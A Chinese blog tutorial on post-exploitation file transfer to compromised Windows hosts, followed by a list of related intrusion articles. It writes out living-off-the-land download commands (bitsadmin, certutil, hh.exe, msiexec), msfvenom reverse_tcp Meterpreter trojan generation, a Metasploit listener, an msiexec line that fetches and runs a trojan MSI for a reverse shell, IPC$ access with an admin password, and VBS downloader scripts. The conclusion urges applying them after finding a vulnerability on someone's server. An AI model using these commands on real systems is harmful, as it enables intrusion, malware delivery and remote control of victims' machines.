后渗透系列之windows文件下载

2023-11-12

后渗透系列之windows文件下载

不知道你们在进行渗透时会不会遇到这样的问题,在进行后渗透时linux系统是可以使用wget命令进行文件下载的,在真实的渗透环境下往往拿到的都只是windows系统的一个命令行,那windows系统怎么做到文件下载,笔者在这里给大家一一介绍

环境准备

首先需要搭建一个http服务,笔者这里使用的是kali linux进行搭建,IP地址192.168.109.128
首先启动apache
service apache2 restart
然后在/var/www/html/test目录随便写入一个文件

准备工作就到此位置,接下来介绍几种windows系统下载文件的方式

Bitsadmin

介绍:该命令只能下载文件到本地磁盘上
使用方法
第一种

bitsadmin /transfer myjob1 /download /priority normal http://192.168.109.128/test/test.txt C:\Users\baji\Desktop\test.txt


第二种

bitsadmin /rawreturn /transfer getfile http://192.168.109.128/test/test.txt C:\Users\baji\Desktop\test.txt


第三种

bitsadmin /rawreturn /transfer getpayload http://192.168.109.128/test/test.txt C:\Users\baji\Desktop\test.txt


支持的系统版本:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10

Certutil

介绍:Windows程序用于处理证书
使用方法

certutil.exe -urlcache -split -f http://192.168.109.128/test/test.txt test.txt

该命令会将文件下载到当前目录

支持的系统版本:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10

HH.exe

介绍:用于处理cmh文件格式的应用程序
使用方法

hh.exe http://192.168.109.128/test/test.txt


这里可以看到,下载的文件是以html的方式进行打开,但是如果是应用程序的话发现就可以做到下载的效果
可以先用msfvenom在网站目录下面生成一个exe后缀的木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.109.128 lport=4444 -f exe -o test.exe


然后在windows这边再次使用hh.exe进行下载

hh.exe http://192.168.109.128/test/test.exe


可以看到是能进行下载的
支持的系统版本:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10

Msiexec.exe

介绍:系统进程,用于安装MSI,一般更新或者安装软件时会碰到,支持远程下载功能
使用方法
先使用kali linux的msfvenom模块在网站目录下面生成一个msi后缀的木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.109.128 lport=8888 -f msi -o test.msi


然后进入msfconsole开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.109.128
set lport 8888
exploit


然后在windows的命令行上输入

msiexec.exe /q /i http://192.168.109.128/test/test.msi


因为msiexec.exe具有下载的特性,所以可以看到kali linux是能够接收到反弹的会话的

支持的系统版本:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10

IPC$

介绍:Windows让进程间通信的开放的命名管道
这里需要两台windows进行实验,因为IPC$是基于windows才有的协议
windows管理员权限打开cmd,输入net share ipc$开启IPC$通道

建立通道

net use \\192.168.109.186\ipc$ /user:administrator "123456"

copy \\192.168.109.186\C$\Users\Administrator\Desktop\1.txt C:\Users\baji\Desktop


即可复制文件成功
支持的系统版本:NT、Windows 2000、Windows XP及以上

VBS脚本

通过脚本也可以实现远程下载
使用方法
第一种
编写脚本文件1.vbs

url = "http://192.168.109.128/test/test.txt"    '网络上的文件地址

saveas = "C:\Users\baji\Desktop\test.txt"                '保存成的本地文件

Set xmlhttp = CreateObject("Microsoft.XMLHTTP") '创建HTTP请求对象

Set stream = CreateObject("ADODB.Stream")       '创建ADO数据流对象

Call xmlhttp.open("GET",url,False)'打开连接

Call xmlhttp.send()'发送请求

stream.mode = 3 '设置数据流为读写模式

stream.type = 1     '设置数据流为二进制模式

Call stream.open()'打开数据流

Call stream.write(xmlhttp.responsebody)'将服务器的返回报文主体内容写入数据流

Call stream.savetofile(saveas,2)'将数据流保存为文件

'释放对象

Set xmlhttp = Nothing

Set stream = Nothing

在windows命令输入cscript 1.vbs即可

第二种
编写脚本文件2.vbs

Set xPost = createObject("Microsoft.XMLHTTP")

xPost.Open "GET","http://192.168.109.128/test/test.txt",0 '下载文件的地址

xPost.Send()

Set sGet = createObject("ADODB.Stream")

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile "C:\Users\baji\Desktop\test.txt",2 '保存文件的路径和文件名

windows命令行输入cscript 2.vbs即可

总结

平常我们在网上下的一些靶机可能都是都是基于linux系统的,但是在真实生活中windows系统还是非常多的,如果哪天你在网站上发现了一个漏洞,但是他的服务器又是一个windows系统,你在拿到他的命令行之后就不知道下一步怎么做了,相信这篇文章能帮到你很多东西

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

后渗透系列之windows文件下载 的相关文章

  • KB2871997补丁绕过

    KB2871997补丁绕过 微软为了防止用户的明文密码在内存中泄露 发布了KB2871997补丁 关闭了Wdigest功能 Windows Server2012及以上版本默认关闭Wdigest 使攻击者无法从内存中获取明文密码 Window
  • 内网安全:WMI协议与SMB协议横向移动

    目录 网络拓扑图 网络环境说明 WMI协议 SMB协议 域内信息收集 WMI协议 横向移动 利用方式一 wmic命令 利用方式一 cscript 利用方式一 impacket SMB协议 横向移动 利用方式一 psexec 利用方式二 ps
  • 防范明文密码和散列值抓取

    一 单机密码抓取的防范方法 微软为了防止用户密码在内存中以明文形式泄露 发不了补丁KB2871997 关闭了Wdigest功能 windows server 2012以上版本默认关闭Wdigest 使攻击者无法从内存中获取明文密码 对于wi
  • 【内网提权】windows2003本地PR提权详解

    提权利用的漏洞 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程 本地攻击者可以利用令牌劫持的方式获得权限提升
  • window横向渗透-IPC命令&schtasks 计划任务上线

    0x01 条件 1 我们获取到目标主机管理员账号密码 并且目标主机的 139 445端口是开启的 0x02 建立ipc协议拷贝cs木马 这时候 我们可以先建立ips 协议 net use ip ipc 密码 user 账号 例子 net u
  • Windows系统提权姿势

    windows系统提权 权限提升简介 权限提升概述 什么是提权 提权分类 提权条件 Windows提权思路 Windows系统提权 Windows提权信息收集 WMIC信息收集 自动信息收集 提权工具脚本 环境搭建 提权 Windows内核
  • CVE-2019-0708 远程桌面代码执行漏洞复现

    0X00 靶机 漏洞环境 我当时就是虚拟机装了Windows7 SP1的系统 一下就ojbk 你们没有 就下载装吧 使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接 这里的靶机是使用清水表哥提供的win7sp
  • Windows主机信息搜集

    注意 一切内容仅用于信息技术分享 切勿用于其他用途 一切后果与作者无关 前言 通过命令执行使用cs拿到了内网的一台主机 接下来我们进行内网的信息搜集 1 内网环境分析 内网渗透 在拿到webshell的时候 想办法获取系统信息拿到系统权限
  • 内网渗透——内网信息收集

    目录 一 内网信息收集简介 1 对当前机器角色进行判断 2 对当前机器所处网络环境及拓扑结构进行判断分析 3 对当前机器所处区域进行判断 二 本机信息收集 1 手动收集 2 相关查询命令 1 获取本机网络配置信息 2 操作系统和软件信息 1
  • windows常见后门隐藏和权限维持方法及排查技术

    https xz aliyun com t 4842 这片文章中隐藏webshell我觉得很nice 进程注入以前试过 wmi 和 bitsadmin 可以了解下 常见backdoor和persistence方式方法 系统工具替换后门 Im
  • 第5章域内横向移动分析及防御

    域内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术 尤其是在高级持续威胁 Advanced Persistent Threats APT中 攻击者会利用该技术 以被攻陷的系统为跳板 访问其他域内主机 扩大资产范围 包括跳板机器中的文档
  • 记一次从web到内网的渗透

    记一次从web到内网的渗透 拓扑图 环境介绍 现在有三台机器 分别为target1 target2 target3 里面分别有三个flag 每个flag的分值不同 需要通过拿下一个已知IP target1 进而向内网里面进行渗透 最终要成功
  • MSF使用教程

    MSF使用教程 1 简介 Metasploit是一款开源安全漏洞检测工具 附带数百个已知的软件漏洞 并保持频繁更新 被安全社区冠以 可以黑掉整个宇宙 之名的强大渗透测试框架 2 MSF模块介绍 1 辅助模块 auxiliary 负责执行信息
  • 后渗透系列之windows文件下载

    后渗透系列之windows文件下载 不知道你们在进行渗透时会不会遇到这样的问题 在进行后渗透时linux系统是可以使用wget命令进行文件下载的 在真实的渗透环境下往往拿到的都只是windows系统的一个命令行 那windows系统怎么做到
  • 【渗透测试笔记】之【内网渗透——CS流量隐蔽】

    文章目录 1 修改端口特征 2 修改证书特征 2 配置CDN 3 生成自定义配置文件 4 效果演示 1 修改端口特征 vim teamserver 将默认端口修改 Dcobaltstrike server port 54321 2 修改证书
  • PWN保护机制以及编译方法

    0x00 声明 以下内容 来自先知社区的作者逆向萌新原创 由于传播 利用此文所提供的信息而造成的任何直接或间接的后果和损失 均由使用者本人负责 长白山攻防实验室以及文章作者不承担任何责任 0x01前言 Ctf中的pwn题 在利用gcc编译的
  • RDP远程桌面密码凭证获取

    前言 在渗透过程中获取到一台Windows服务器后 可以尝试获取当前机器保存的RDP远程桌面密码凭证 进而在内网横向渗透中进一步扩大战果 0x01 密码凭证获取 查看当前主机本地连接过的目标机器记录 reg query HKEY CURRE
  • 域环境的搭建的详细教程-220109

    参考链接 https mp weixin qq com s src 11 timestamp 1641696209 ver 3547 signature zTIDZEcpq zjwuEuZpbaaAxFfkkVxcLHeX4AuKT78bJ
  • 【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】

    拓扑图 Windows系统散列值获取 1 通过CS模块获取用户凭证信息 在获取到目标主机权限后 我们可以抓取hash和dump明文密码 这两项功能都需要管理员权限 如果权限不足 先要进行提权操作 抓取密码哈希 右键被控主机 gt Acces
  • 红日安全靶机实战(一)

    0x01 入侵web服务器 0x 1 1 信息收集 首先使用 nmap 来扫描ip 段存活的主机 nmap sn 192 168 127 0 24 这里网上有的用 netdiscover 来扫描 其实和 nmap sn 扫描原理是一样的 都

随机推荐

  • Flutter层叠布局 Stack、Positioned

    Flutter中使用Stack和Positioned这两个组件来配合实现绝对定位 Stack允许子组件堆叠 而Positioned用于根据Stack的四个角来确定子组件的位置 Stack alignment 此参数决定如何去对齐没有定位 没
  • FiddlerCore HTTPS 证书每次都需要创建的问题

    FiddlerCore HTTPS 证书每次都需要创建的问题 问题描述 我使用FiddlerCore来抓取HTTPS数据 需要安装证书 使用以下代码进行安装 安装证书 public static bool InstallCertificat
  • python读取mongoDb数据库保存到Excel CSV中

    import xlwt import pymongo import pandas as pd import xlsxwriter as xw 连接mongodb数据库 client pymongo MongoClient localhost
  • 防火墙安全策略&&防火墙安全区域的划分

    给两台PC任意设置两个网段 并划分好trust和untrust区域 利用默认账号密码登录 账号 admin密码 Admin 123 然后自行随意修改密码 给防火墙的两个接口配上对应地址并放行 两个接口进行同样的操作 这个时候还是不能够通信
  • API接口设计规范

    说明 在实际的业务中 难免会跟第三方系统进行数据的交互与传递 那么如何保证数据在传输过程中的安全呢 防窃取 除了https的协议之外 能不能加上通用的一套算法以及规范来保证传输的安全性呢 下面我们就来讨论下常用的一些API设计的安全方法 可
  • taro-vue3监听左滑/右滑手势退出

    一 业务背景 我做的是一个要货小程序 没有华丽的页面 没有购物车 就是在要货页面填写要货数量 然后跳转到预览页面 预览页面有保存和支付按钮 可以先点保存 再点支付 也可以直接点支付 支付的同时进行保存 问题 支付成功后直接跳转回菜单页面 但
  • pytorch利用resnet50实现cifar10准确率到95%以上

    目录 前言 代码 前言 因为课程需要 老师要求使用resnet18或者resnet50将cifar10训练到精度到达95 试过了网上其他很多方法 发现精度最高的是在预处理化的时候 图片resize到32 32 并且padding 4进行填充
  • elasticsearch 版本 2xx和5xx 及 elasticsearch5.x 新特性

    其实 elasticsearch5 x 和 elasticsearch2 x 并不区别很大 是因为 ELK里之前版本各种很混乱 直接升级到5 0了 其实 elasticsearch5 x 按理来说是elasticsearch3 x 只是为了
  • Pyside6 TableView 显示按钮 - QStyledItemDelegate 简单实现

    提示 文章写完后 目录可以自动生成 如何生成可参考右边的帮助文档 目录 示例代码 效果图 参考链接 示例代码 coding utf 8 import sys from PySide6 QtCore import from PySide6 Q
  • 抓包工具tcpdump用法说明

    tcpdump采用命令行方式对接口的数据包进行筛选抓取 其丰富特性表现在灵活的表达式上 不带任何选项的tcpdump 默认会抓取第一个网络接口 且只有将tcpdump进程终止才会停止抓包 例如 shell gt tcpdump nn i e
  • 关于Java中代码块的执行顺序

    1 概念 代码块 使用 定义的一段代码 根据代码块出现的位置以及关键字不同 分为以下四种代码块 普通代码块 直接定义在方法内部 不加任何修饰符定义的代码块 解决变量重名问题 构造块 直接定义在类中 使用 的代码块 静态代码块 一般用于初始化
  • vue2项目引入vue-video-player

    直接安装npm install vue video player save报错 指定版本 npm install vue video player 5 0 1 save vue video player 其实就是 video js 集成到
  • Spring集成Mybatis时的常见报错

    这两个框架集成的时候最常见的是各种映射文件无法对应而引发的报错 根据不同的报错可以优先检查对应的位置 这样才能快速解决问题 1 找不到mybatis的映射文件 如下图 在定义SqlSessionFactoryBean 要注意对应关系 注意
  • ps太卡怎么办?几步帮您解决问题

    PS是一款非常常用的绘图软件 但是有些小伙伴感觉用PS会卡顿 可是电脑的配置也不是很低 排除PS本身的问题后 这种情况往往和ps里的基础设置有关 下面来看看该如何解决PS卡顿的问题吧 1 停用 主页 屏幕 现在很多小伙伴都用上了新版ps 新
  • 我的程序员之路进行中

    计划看的书 1 Windows程序设计 第5版珍藏版 1104页 2 Windows程序设计 第2版 王艳平 扫描版 490页 3 Windows核心编程 第5版 769页 4 竹林蹊径 深入浅出windows驱动开发 506页 5 Win
  • Mybatis小技巧之使用自动生成的主键值

    文章目录 一 需求 1 编写接口 2 编写mapper配置文件 3 测试程序 4 运行结果 一 需求 在数据库种类似id这样的主键值都是自动增长的 但是如果有这样的需求时 插入一条记录后 自动生成了主键 而这个主键需要在其他表中使用时 此时
  • 关联分析算法(一)——Apriori(先验算法)

    算法思路简介 Apriori根据原始的销售表 第一步 列出所有元素 所有元素独立组成一个集合 计算每个集合的支持度 然后根据最小支持度的阈值剔除掉小的支持度的集合 第二步 每个集合都增加一个与原有集合中没有的元素 构成多个新的集合 计算每个
  • ARM 汇编基础知识

    1 为什么学习汇编 我们在进行嵌入式 Linux 开发的时候是绝对要掌握基本的 ARM 汇编 因为 Cortex A 芯片一 上电 SP 指针还没初始化 C 环境还没准备好 所以肯定不能运行 C 代码 必须先用汇编语言设置好 C 环境 比如
  • 容联云通讯完成发送验证码

    容联云通讯完成发送验证码 不是广告 真人编写 学习记录分享而已 容联云通讯官方网站 https www yuntongxun com 进入网站后 找到测试号码 绑定测试的手机号 最多绑定是三个 第二部 查找相关语言demo 以及SDK 点击
  • 后渗透系列之windows文件下载

    后渗透系列之windows文件下载 不知道你们在进行渗透时会不会遇到这样的问题 在进行后渗透时linux系统是可以使用wget命令进行文件下载的 在真实的渗透环境下往往拿到的都只是windows系统的一个命令行 那windows系统怎么做到